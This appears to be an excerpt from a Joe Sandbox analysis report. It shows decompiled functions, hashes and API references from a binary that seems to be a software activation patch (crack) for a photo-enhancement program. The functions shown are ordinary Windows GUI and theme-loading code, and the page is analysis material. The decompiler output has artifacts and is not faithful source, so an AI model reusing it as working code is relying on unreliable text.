Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: c4c3171c16221adfd5b81782e44e5dcf2185ce4d9b680bd399da6d8afc7dca24
Instruction ID: 01611b9c15ef78b160da910fd5818d9ac2674b067f1b6166a22c9a12ef003207
Opcode Fuzzy Hash: c4c3171c16221adfd5b81782e44e5dcf2185ce4d9b680bd399da6d8afc7dca24
Instruction Fuzzy Hash: CAF02D72A04704AB8B10DF76AC0149EF7BCEB8637672046BBFC14E3692DB794F058558

Uniqueness

Uniqueness Score: -1.00%

Function 00417A28 Relevance: 3.0, APIs: 2, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417A28(intOrPtr* __eax, void* __edx) {
				intOrPtr _t15;
				void* _t17;
				void* _t19;
				intOrPtr* _t20;
				void* _t27;

				_t27 = __edx;
				_t20 = __eax;
				if(( *(__edx + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(__edx + 8)) == 0x20 ||  *((short*)(__edx + 8)) == 0x2d || IsIconic( *(__eax + 0xc0)) != 0 || GetCapture() != 0) {
					L8:
					return  *((intOrPtr*)( *_t20 - 0x10))();
				}
				_t15 =  *0x49e62c; // 0x2252410
				if(_t20 ==  *((intOrPtr*)(_t15 + 0x28))) {
					goto L8;
				}
				_t17 = E0041FB04(_t20);
				_t26 = _t17;
				if(_t17 == 0) {
					goto L8;
				}
				_t19 = E004156D0(_t26, 0, 0xb017, _t27);
				if(_t19 == 0) {
					goto L8;
				}
				return _t19;
			}

0x00417a2b
0x00417a2d
0x00417a3c
0x00417a8f
0x00000000
0x00417a95
0x00417a65
0x00417a6d
0x00000000
0x00000000
0x00417a71
0x00417a76
0x00417a7a
0x00000000
0x00000000
0x00417a86
0x00417a8d
0x00000000
0x00000000
0x00417a9b

APIs

IsIconic.USER32 ref: 00417A53
GetCapture.USER32 ref: 00417A5C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 073c61da986b851ed91b01dc4edd4d44481f828fdb5f494e447c34106efb423a
Instruction ID: 4baae68772761491d2023ced8ce828277fc49fe1aa00b8ecf1210e993849b5ad
Opcode Fuzzy Hash: 073c61da986b851ed91b01dc4edd4d44481f828fdb5f494e447c34106efb423a
Instruction Fuzzy Hash: AFF0317134460287DB20E66AC885ABF62B99F48395F14443BE515C7356EA6CDD848358

Uniqueness

Uniqueness Score: -1.00%

Function 00424624 Relevance: 3.0, APIs: 2, Instructions: 22
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424624(void* __eax, void* __ecx) {
				int _t9;
				void* _t17;
				void* _t18;

				_t18 = __ecx;
				_t17 = __eax;
				_t9 = IsIconic( *(__eax + 0x20));
				_t21 = _t9;
				if(_t9 == 0) {
					E00423F14(_t17, _t18);
					SetActiveWindow( *(_t17 + 0x20));
					_t9 = E00423ADC( *(_t17 + 0x20), 6, _t21);
					if( *((short*)(_t17 + 0xce)) != 0) {
						return  *((intOrPtr*)(_t17 + 0xcc))();
					}
				}
				return _t9;
			}

0x00424624
0x00424625
0x0042462b
0x00424630
0x00424632
0x00424636
0x0042463f
0x0042464c
0x00424659
0x00000000
0x00424663
0x00424659
0x0042466a

APIs

IsIconic.USER32 ref: 0042462B

Part of subcall function 00423F14: EnumWindows.USER32(00423EAC), ref: 00423F38
Part of subcall function 00423F14: GetWindow.USER32(?,00000003), ref: 00423F4D
Part of subcall function 00423F14: GetWindowLongA.USER32 ref: 00423F5C
Part of subcall function 00423F14: SetWindowPos.USER32(00000000,EB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042463B,?,?,00424203), ref: 00423F92

SetActiveWindow.USER32(?,?,?,00424203,00000000,004245EC), ref: 0042463F

Part of subcall function 00423ADC: ShowWindow.USER32(004108F0,00000009,?,00000000,0041F234,00423DCA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00423AF7

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$ActiveEnumIconicLongShowWindows
String ID:
API String ID: 2671590913-0
Opcode ID: 79a778728c02cc4edaf90c7f9b948427ca67b0e60320da5664268fec259b68fe
Instruction ID: d3e93a58e57438a951a07f29fe0797b16f8422c20572e0da7720cbe2ca5f63be
Opcode Fuzzy Hash: 79a778728c02cc4edaf90c7f9b948427ca67b0e60320da5664268fec259b68fe
Instruction Fuzzy Hash: B4E01A60700100C7EF00EFAAE8C4F8662A4BF88304F95017ABC48CF24BD67CDC448724

Uniqueness

Uniqueness Score: -1.00%

Function 00412A68 Relevance: 1.7, APIs: 1, Instructions: 188
nativeCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00412A68(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				void* __edi;
				void* _t46;
				intOrPtr _t53;
				void* _t57;
				signed int _t60;
				void* _t68;
				signed int _t72;
				void* _t74;
				signed int _t78;
				intOrPtr _t82;
				intOrPtr _t87;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t125;
				signed int _t126;
				intOrPtr _t128;
				intOrPtr _t135;
				intOrPtr _t138;
				intOrPtr _t143;
				void* _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				intOrPtr* _t149;
				intOrPtr _t151;

				_t149 = __edx;
				_v8 = __eax;
				_push(0x412c65);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t151;
				_t46 =  *__edx - 0x53;
				if(_t46 == 0) {
					_v16 =  *((intOrPtr*)(__edx + 8));
					_t91 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t91;
					if(_t91 < 0) {
						L37:
						_push( *((intOrPtr*)(_t149 + 8)));
						_push( *(_t149 + 4));
						_push( *_t149);
						_t53 =  *((intOrPtr*)(_v8 + 0x10));
						L00405E1C();
						 *((intOrPtr*)(_t149 + 0xc)) = _t53;
						_t118 = _t53;
						 *[fs:eax] = _t118;
						return 0;
					}
					_t92 = _t91 + 1;
					_t145 = 0;
					__eflags = 0;
					while(1) {
						_t57 =  *((intOrPtr*)( *((intOrPtr*)(E0040B6DC(_v8, _t145))) + 0x2c))();
						_t121 = _v16;
						__eflags = _t57 -  *((intOrPtr*)(_t121 + 0xc));
						if(_t57 ==  *((intOrPtr*)(_t121 + 0xc))) {
							break;
						}
						_t145 = _t145 + 1;
						_t92 = _t92 - 1;
						__eflags = _t92;
						if(_t92 != 0) {
							continue;
						}
						goto L37;
					}
					E0040B6DC(_v8, _t145);
					_t60 = E004126A8(1,  *((intOrPtr*)(_v16 + 8)));
					__eflags = _t60;
					if(_t60 == 0) {
						E0040B6DC(_v8, _t145);
						__eflags = 0;
						_t60 = E004126A8(0,  *((intOrPtr*)(_v16 + 0xc)));
					}
					_t125 =  *0x49e630; // 0x2250660
					_t126 =  *(_t125 + 0x40);
					__eflags = _t126;
					if(_t126 != 0) {
						__eflags =  *(_t126 + 0x110) & 0x00000008;
						if(( *(_t126 + 0x110) & 0x00000008) == 0) {
							E00424D7C(_t60);
						} else {
							E00424D88();
						}
						_pop(_t128);
						 *[fs:eax] = _t128;
						return 0;
					} else {
						_pop( *[fs:0x0]);
						return _t60;
					}
				}
				_t68 = _t46 - 0xbe;
				if(_t68 == 0) {
					_t94 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t94;
					if(_t94 < 0) {
						goto L37;
					}
					_t95 = _t94 + 1;
					_t146 = 0;
					__eflags = 0;
					while(1) {
						E0040B6DC(_v8, _t146);
						_t72 = E004126DC( *(_t149 + 4), __eflags);
						__eflags = _t72;
						if(_t72 != 0) {
							break;
						}
						_t146 = _t146 + 1;
						_t95 = _t95 - 1;
						__eflags = _t95;
						if(_t95 != 0) {
							continue;
						}
						goto L37;
					}
					_pop(_t135);
					 *[fs:eax] = _t135;
					return 0;
				}
				_t74 = _t68 - 6;
				if(_t74 == 0) {
					_t97 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t97;
					if(_t97 < 0) {
						goto L37;
					}
					_t98 = _t97 + 1;
					_t147 = 0;
					__eflags = 0;
					while(1) {
						E0040B6DC(_v8, _t147);
						_t78 = E004126F8( *(_t149 + 4), __eflags);
						__eflags = _t78;
						if(_t78 != 0) {
							break;
						}
						_t147 = _t147 + 1;
						_t98 = _t98 - 1;
						__eflags = _t98;
						if(_t98 != 0) {
							continue;
						}
						goto L37;
					}
					_pop(_t138);
					 *[fs:eax] = _t138;
					return 0;
				}
				if(_t74 == 8) {
					_v9 = 0;
					__eflags =  *(__edx + 6) & 0x00000010;
					if(( *(__edx + 6) & 0x00000010) != 0) {
						_v9 = 1;
					}
					_t100 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t100;
					if(__eflags < 0) {
						L24:
						_t82 =  *0x49e62c; // 0x2252410
						E00424F84(_t82, 0, _t144, __eflags);
						goto L37;
					} else {
						_t101 = _t100 + 1;
						_t148 = 0;
						__eflags = 0;
						while(1) {
							__eflags = E00412678(E0040B6DC(_v8, _t148), _v9,  *(_t149 + 4) & 0x0000ffff);
							if(__eflags != 0) {
								break;
							}
							_t148 = _t148 + 1;
							_t101 = _t101 - 1;
							__eflags = _t101;
							if(__eflags != 0) {
								continue;
							}
							goto L24;
						}
						_t87 =  *0x49e62c; // 0x2252410
						E00424F84(_t87,  *((intOrPtr*)(_t86 + 0x38)), _t148, __eflags);
						_pop(_t143);
						 *[fs:eax] = _t143;
						return 0;
					}
				}
				goto L37;
			}

0x00412a71
0x00412a73
0x00412a79
0x00412a7e
0x00412a81
0x00412a86
0x00412a89
0x00412b8e
0x00412b97
0x00412b98
0x00412b9a
0x00412c41
0x00412c44
0x00412c48
0x00412c4b
0x00412c4f
0x00412c53
0x00412c58
0x00412c5d
0x00412c60
0x00000000
0x00412c60
0x00412ba0
0x00412ba1
0x00412ba1
0x00412ba3
0x00412baf
0x00412bb2
0x00412bb5
0x00412bb8
0x00000000
0x00000000
0x00412c39
0x00412c3a
0x00412c3a
0x00412c3b
0x00000000
0x00000000
0x00000000
0x00412c3b
0x00412bbf
0x00412bcd
0x00412bd2
0x00412bd4
0x00412bdb
0x00412be7
0x00412be9
0x00412be9
0x00412bee
0x00412bf4
0x00412bf7
0x00412bf9
0x00412c07
0x00412c0e
0x00412c2a
0x00412c10
0x00412c1c
0x00412c1c
0x00412c31
0x00412c34
0x00000000
0x00412bfb
0x00412bfb
0x00000000
0x00412c02
0x00412bf9
0x00412a8f
0x00412a94
0x00412aaf
0x00412ab0
0x00412ab2
0x00000000
0x00000000
0x00412ab8
0x00412ab9
0x00412ab9
0x00412abb
0x00412ac0
0x00412ac9
0x00412ace
0x00412ad0
0x00000000
0x00000000
0x00412adf
0x00412ae0
0x00412ae0
0x00412ae1
0x00000000
0x00000000
0x00000000
0x00412ae3
0x00412ad4
0x00412ad7
0x00000000
0x00412ad7
0x00412a96
0x00412a99
0x00412aee
0x00412aef
0x00412af1
0x00000000
0x00000000
0x00412af7
0x00412af8
0x00412af8
0x00412afa
0x00412aff
0x00412b07
0x00412b0c
0x00412b0e
0x00000000
0x00000000
0x00412b1d
0x00412b1e
0x00412b1e
0x00412b1f
0x00000000
0x00000000
0x00000000
0x00412b21
0x00412b12
0x00412b15
0x00000000
0x00412b15
0x00412a9e
0x00412b26
0x00412b2a
0x00412b2e
0x00412b30
0x00412b30
0x00412b3a
0x00412b3b
0x00412b3d
0x00412b7a
0x00412b7c
0x00412b81
0x00000000
0x00412b3f
0x00412b3f
0x00412b40
0x00412b40
0x00412b42
0x00412b58
0x00412b5a
0x00000000
0x00000000
0x00412b76
0x00412b77
0x00412b77
0x00412b78
0x00000000
0x00000000
0x00000000
0x00412b78
0x00412b5f
0x00412b64
0x00412b6b
0x00412b6e
0x00000000
0x00412b6e
0x00412b3d
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00412C65), ref: 00412C53

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 76210ea955b4234c29723da591833cea603cabc76a58ce7e5be2657fdfd9ecd6
Instruction ID: b726886feaa3cfb0c3c92f2e05cced8293b81fa2aba97a9fc1f2d8d784250eff
Opcode Fuzzy Hash: 76210ea955b4234c29723da591833cea603cabc76a58ce7e5be2657fdfd9ecd6
Instruction Fuzzy Hash: BD51F7317086058FC714DF6AD680A9AF3E5FFA8304B20866BD844C7365E7B8AD91C749

Uniqueness

Uniqueness Score: -1.00%

Function 0047AC34 Relevance: 1.6, APIs: 1, Instructions: 107
nativeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0047AC34(intOrPtr __eax, signed int __edx) {
				intOrPtr* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t42;
				void* _t54;
				intOrPtr _t56;
				intOrPtr _t58;
				signed int _t60;
				signed int _t70;
				intOrPtr _t77;
				void* _t86;
				void* _t87;
				intOrPtr _t94;

				_v8 = __edx;
				_t42 =  *_v8 - 0x4a;
				if(_t42 == 0) {
					_push(0x47acba);
					_push( *[fs:eax]);
					 *[fs:eax] = _t94;
					_t92 =  *((intOrPtr*)(_v8 + 8));
					_t90 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8))));
					if( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)))) + 0xb58c1640 - 2 < 0) {
						 *(_v8 + 0xc) = E0047A9E8(__eax, __eax, __edx & 0xffffff00 | _t90 == 0x4a73e9c1, _t90, _t92,  *((intOrPtr*)(_t92 + 4)));
					}
					_pop(_t77);
					 *[fs:eax] = _t77;
					return 0;
				}
				_t54 = _t42 - 0x44c;
				if(_t54 == 0) {
					_t56 =  *((intOrPtr*)(_v8 + 4));
					if(_t56 != 0x2710) {
						if(_t56 != 0x2711) {
							return _t56;
						}
						_t58 =  *((intOrPtr*)(_v8 + 8));
						 *((intOrPtr*)(__eax + 0x14)) = _t58;
						return _t58;
					}
					 *((char*)(__eax + 0x10)) = 1;
					return _t56;
				}
				if(_t54 != 0x14ba) {
					_push( *((intOrPtr*)(_v8 + 8)));
					_push( *((intOrPtr*)(_v8 + 4)));
					_push( *_v8);
					_t70 =  *(__eax + 4);
					_push(_t70);
					L00405E1C();
					 *(_v8 + 0xc) = _t70;
					return _t70;
				}
				_t60 = 0x6c840005;
				if( *((intOrPtr*)(_v8 + 8)) == ( *(__eax + 8) & 0x0000ffff)) {
					_t60 = 0x6c840006;
					_t86 =  *((intOrPtr*)(_v8 + 4)) - 1;
					if(_t86 == 0) {
						_t60 =  *(__eax + 0xa) & 0x0000ffff | 0x6c830000;
					} else {
						_t87 = _t86 - 1;
						if(_t87 == 0) {
							_t60 =  *(__eax + 0xc) & 0x0000ffff | 0x6c830000;
						} else {
							if(_t87 == 1) {
								_t60 =  *(__eax + 0xe) & 0x0000ffff | 0x6c830000;
							}
						}
					}
				}
				 *(_v8 + 0xc) = _t60;
				return _t60;
			}

0x0047ac3b
0x0047ac45
0x0047ac48
0x0047ac68
0x0047ac6d
0x0047ac70
0x0047ac76
0x0047ac79
0x0047ac85
0x0047acaa
0x0047acaa
0x0047acaf
0x0047acb2
0x00000000
0x0047acb2
0x0047ac4a
0x0047ac4f
0x0047ad45
0x0047ad4d
0x0047ad5d
0x0047ad92
0x0047ad92
0x0047ad62
0x0047ad65
0x00000000
0x0047ad65
0x0047ad4f
0x00000000
0x0047ad4f
0x0047ac5a
0x0047ad70
0x0047ad77
0x0047ad7d
0x0047ad7e
0x0047ad81
0x0047ad82
0x0047ad8a
0x00000000
0x0047ad8a
0x0047acf2
0x0047ad03
0x0047ad05
0x0047ad10
0x0047ad11
0x0047ad1f
0x0047ad13
0x0047ad13
0x0047ad14
0x0047ad2a
0x0047ad16
0x0047ad17
0x0047ad35
0x0047ad35
0x0047ad17
0x0047ad14
0x0047ad11
0x0047ad3d
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0047AD82

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: ac3a0e397c45ef836a8712edbd6479a7937f26d08489729a49ce9afc46fadd63
Instruction ID: 72cb5964904ea9acb86450fde6e950c62e8bde0ebf735d0adfbf9209324b5543
Opcode Fuzzy Hash: ac3a0e397c45ef836a8712edbd6479a7937f26d08489729a49ce9afc46fadd63
Instruction Fuzzy Hash: C6415B75604104EFCB20CF59C2908AEB7F6EB88311B74C992E849DB751D338EE51DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00455DCC Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00455DCC(void* __eax) {
				char _v264;
				void* _t10;
				DWORD* _t13;

				_t13 =  &_v264;
				_t10 = __eax;
				 *_t13 = 0x101;
				if(GetUserNameA( &_v264, _t13) == 0) {
					return E00403400(_t10);
				}
				return E0040355C(_t10, 0x101,  &_v264);
			}

0x00455dcd
0x00455dd3
0x00455dd5
0x00455de9
0x00000000
0x00455dff
0x00000000

APIs

GetUserNameA.ADVAPI32(?), ref: 00455DE2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 065d5d2aa7b724ed6289c5adcb70c30f8e9a1dde2e28f2192dd81213443c68fe
Instruction ID: 85d927fa64bde7e0f6bd0e56391a747b52e91616c2131cbf33e1fd207173554c
Opcode Fuzzy Hash: 065d5d2aa7b724ed6289c5adcb70c30f8e9a1dde2e28f2192dd81213443c68fe
Instruction Fuzzy Hash: 91D0C2B230460063C700BA68DC825AA358D8B84305F00483E7CC5DA2C3EABDDA4C5696

Uniqueness

Uniqueness Score: -1.00%

Function 0042FA00 Relevance: 1.5, APIs: 1, Instructions: 17
nativeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042FA00(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t5;
				intOrPtr _t6;

				_t5 = _a8;
				if(_t5 != 0x10) {
					_push(_a16);
					_push(_a12);
					_push(_t5);
					_t6 = _a4;
					_push(_t6);
					L00405E1C();
					return _t6;
				}
				return 0;
			}

0x0042fa03
0x0042fa09
0x0042fa12
0x0042fa16
0x0042fa17
0x0042fa18
0x0042fa1b
0x0042fa1c
0x00000000
0x0042fa1c
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042FA1C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 9c092c28255bcc30e80686d9f5dffef4909b4cfadbe587d4d40091b81cadcf9b
Instruction ID: e991843b48109e052d0f5957ab47f1130dd67dcde68d8ed9d112e108350b7662
Opcode Fuzzy Hash: 9c092c28255bcc30e80686d9f5dffef4909b4cfadbe587d4d40091b81cadcf9b
Instruction Fuzzy Hash: 02D05E7131010C6B9B00DE98E840C6B33AC9B88700BA08829F908C7201C634ED1097A8

Uniqueness

Uniqueness Score: -1.00%

Function 0044BBBC Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 282
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0044BBBC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _t122;
				intOrPtr _t130;

				_push(0);
				_push(0);
				_push(_t130);
				_push(0x44bf9f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130;
				 *0x49e76c =  *0x49e76c + 1;
				if( *0x49e768 == 0) {
					E0044BB38();
					if(0 != 0) {
						E0044BB8C( &_v12);
						E0042C88C(_v12,  &_v8);
						E0040357C( &_v8, "uxtheme.dll");
						LoadLibraryA(E00403738(_v8));
						 *0x49e768 = 0;
						if( *0x49e768 != 0) {
							 *0x49e6ac = GetProcAddress( *0x49e768, "OpenThemeData");
							 *0x49e6b0 = GetProcAddress( *0x49e768, "CloseThemeData");
							 *0x49e6b4 = GetProcAddress( *0x49e768, "DrawThemeBackground");
							 *0x49e6b8 = GetProcAddress( *0x49e768, "DrawThemeText");
							 *0x49e6bc = GetProcAddress( *0x49e768, "GetThemeBackgroundContentRect");
							 *0x49e6c0 = GetProcAddress( *0x49e768, "GetThemeBackgroundContentRect");
							 *0x49e6c4 = GetProcAddress( *0x49e768, "GetThemePartSize");
							 *0x49e6c8 = GetProcAddress( *0x49e768, "GetThemeTextExtent");
							 *0x49e6cc = GetProcAddress( *0x49e768, "GetThemeTextMetrics");
							 *0x49e6d0 = GetProcAddress( *0x49e768, "GetThemeBackgroundRegion");
							 *0x49e6d4 = GetProcAddress( *0x49e768, "HitTestThemeBackground");
							 *0x49e6d8 = GetProcAddress( *0x49e768, "DrawThemeEdge");
							 *0x49e6dc = GetProcAddress( *0x49e768, "DrawThemeIcon");
							 *0x49e6e0 = GetProcAddress( *0x49e768, "IsThemePartDefined");
							 *0x49e6e4 = GetProcAddress( *0x49e768, "IsThemeBackgroundPartiallyTransparent");
							 *0x49e6e8 = GetProcAddress( *0x49e768, "GetThemeColor");
							 *0x49e6ec = GetProcAddress( *0x49e768, "GetThemeMetric");
							 *0x49e6f0 = GetProcAddress( *0x49e768, "GetThemeString");
							 *0x49e6f4 = GetProcAddress( *0x49e768, "GetThemeBool");
							 *0x49e6f8 = GetProcAddress( *0x49e768, "GetThemeInt");
							 *0x49e6fc = GetProcAddress( *0x49e768, "GetThemeEnumValue");
							 *0x49e700 = GetProcAddress( *0x49e768, "GetThemePosition");
							 *0x49e704 = GetProcAddress( *0x49e768, "GetThemeFont");
							 *0x49e708 = GetProcAddress( *0x49e768, "GetThemeRect");
							 *0x49e70c = GetProcAddress( *0x49e768, "GetThemeMargins");
							 *0x49e710 = GetProcAddress( *0x49e768, "GetThemeIntList");
							 *0x49e714 = GetProcAddress( *0x49e768, "GetThemePropertyOrigin");
							 *0x49e718 = GetProcAddress( *0x49e768, "SetWindowTheme");
							 *0x49e71c = GetProcAddress( *0x49e768, "GetThemeFilename");
							 *0x49e720 = GetProcAddress( *0x49e768, "GetThemeSysColor");
							 *0x49e724 = GetProcAddress( *0x49e768, "GetThemeSysColorBrush");
							 *0x49e728 = GetProcAddress( *0x49e768, "GetThemeSysBool");
							 *0x49e72c = GetProcAddress( *0x49e768, "GetThemeSysSize");
							 *0x49e730 = GetProcAddress( *0x49e768, "GetThemeSysFont");
							 *0x49e734 = GetProcAddress( *0x49e768, "GetThemeSysString");
							 *0x49e738 = GetProcAddress( *0x49e768, "GetThemeSysInt");
							 *0x49e73c = GetProcAddress( *0x49e768, "IsThemeActive");
							 *0x49e740 = GetProcAddress( *0x49e768, "IsAppThemed");
							 *0x49e744 = GetProcAddress( *0x49e768, "GetWindowTheme");
							 *0x49e748 = GetProcAddress( *0x49e768, "EnableThemeDialogTexture");
							 *0x49e74c = GetProcAddress( *0x49e768, "IsThemeDialogTextureEnabled");
							 *0x49e750 = GetProcAddress( *0x49e768, "GetThemeAppProperties");
							 *0x49e754 = GetProcAddress( *0x49e768, "SetThemeAppProperties");
							 *0x49e758 = GetProcAddress( *0x49e768, "GetCurrentThemeName");
							 *0x49e75c = GetProcAddress( *0x49e768, "GetThemeDocumentationProperty");
							 *0x49e760 = GetProcAddress( *0x49e768, "DrawThemeParentBackground");
							_t9 = GetProcAddress( *0x49e768, "EnableTheming");
							 *0x49e764 = 0;
						}
					}
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(E0044BFA6);
				return E00403420( &_v12, 2);
			}

0x0044bbbf
0x0044bbc1
0x0044bbcd
0x0044bbce
0x0044bbd3
0x0044bbd6
0x0044bbd9
0x0044bbe2
0x0044bbe8
0x0044bbef
0x0044bbf8
0x0044bc03
0x0044bc10
0x0044bc1e
0x0044bc23
0x0044bc28
0x0044bc3b
0x0044bc4d
0x0044bc5f
0x0044bc71
0x0044bc83
0x0044bc95
0x0044bca7
0x0044bcb9
0x0044bccb
0x0044bcdd
0x0044bcef
0x0044bd01
0x0044bd13
0x0044bd25
0x0044bd37
0x0044bd49
0x0044bd5b
0x0044bd6d
0x0044bd7f
0x0044bd91
0x0044bda3
0x0044bdb5
0x0044bdc7
0x0044bdd9
0x0044bdeb
0x0044bdfd
0x0044be0f
0x0044be21
0x0044be33
0x0044be45
0x0044be57
0x0044be69
0x0044be7b
0x0044be8d
0x0044be9f
0x0044beb1
0x0044bec3
0x0044bed5
0x0044bee7
0x0044bef9
0x0044bf0b
0x0044bf1d
0x0044bf2f
0x0044bf41
0x0044bf53
0x0044bf65
0x0044bf72
0x0044bf77
